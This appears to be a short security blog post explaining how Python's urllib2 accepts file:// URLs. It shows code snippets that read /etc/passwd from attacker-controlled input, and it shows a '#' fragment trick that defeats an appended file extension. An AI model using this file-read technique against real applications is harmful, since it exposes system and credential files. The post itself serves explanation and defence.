Security Concerns With Python's urllib and urllib2

Applications written in Python should not use urllib and urllib2 for the following reasons.

  1. External proxy support isn’t trivial to implement, which usually means it isn’t implemented at all.
  2. The urlopen functionality does not implement ANY SSL verification.
  3. Many types of URL’s are supported, including file://.

For now lets focus on number 3.

It is commonly exploited with the following code:

>>> import urllib2
>>> attacker_controlled_input = "file:///etc/passwd"
>>> print urllib2.urlopen(attacker_controlled_input).read()

If you control attacker_controlled_input, you have as much control as if you had an XML XXE attack (arbitrary file read, DoS by read /dev/zero etc..).

However, it is really important that you control the first part of the input. Without it, you would not be able to exploit this functionality.

Now, say you control the first part of the input but something is being appended to that input e.g:

>>> import urllib2
>>> attacker_controlled_data = "file:///etc/passwd"
>>> ext = ".csv"
>>> print urllib2.urlopen(attacker_controlled_data + ext).read()

You are stuck! While you would be able to read any .csv file on the system your lofty goal of /etc/passwd is not obtainable!

You may be tempted to insert a NUL byte at the end of your input. e.g

>>> import urllib2
>>> attacker_controlled_data = "file:///etc/passwd%00"
>>> ext = ".csv"
>>> print urllib2.urlopen(attacker_controlled_data + ext).read()

But Python does not let you open files with strings that have NUL bytes in them. It will throw the following exception.

TypeError: must be encoded string without NULL bytes, not str

Fear not! There is still hope. Lets take a step back and remember we are exploiting a URL library.

URL libraries have to handle all types of URLs. While I will not go into an in-depth explanation of on URL construction. I will focus on one part, the URL fragment. A URL fragment is generally used by a browser to scroll to a specific location on the page (for more information please see the following Wikipedia article http://en.wikipedia.org/wiki/Fragment_identifier).

However, they mean nothing to any URL fetching library.

Making use of this knowledge, we can craft our payload to look like this:

>>> import urllib2
>>> attacker_controlled_data = "file:///etc/passwd#"
>>> ext = ".csv"
>>> print urllib2.urlopen(attacker_controlled_data + ext).read()

And obtain the contents of /etc/passwd.

It is important to note that the above mentioned workaround doesn’t work with urllib, it only works with urllib2.

Have a good day and a wonderful independence day!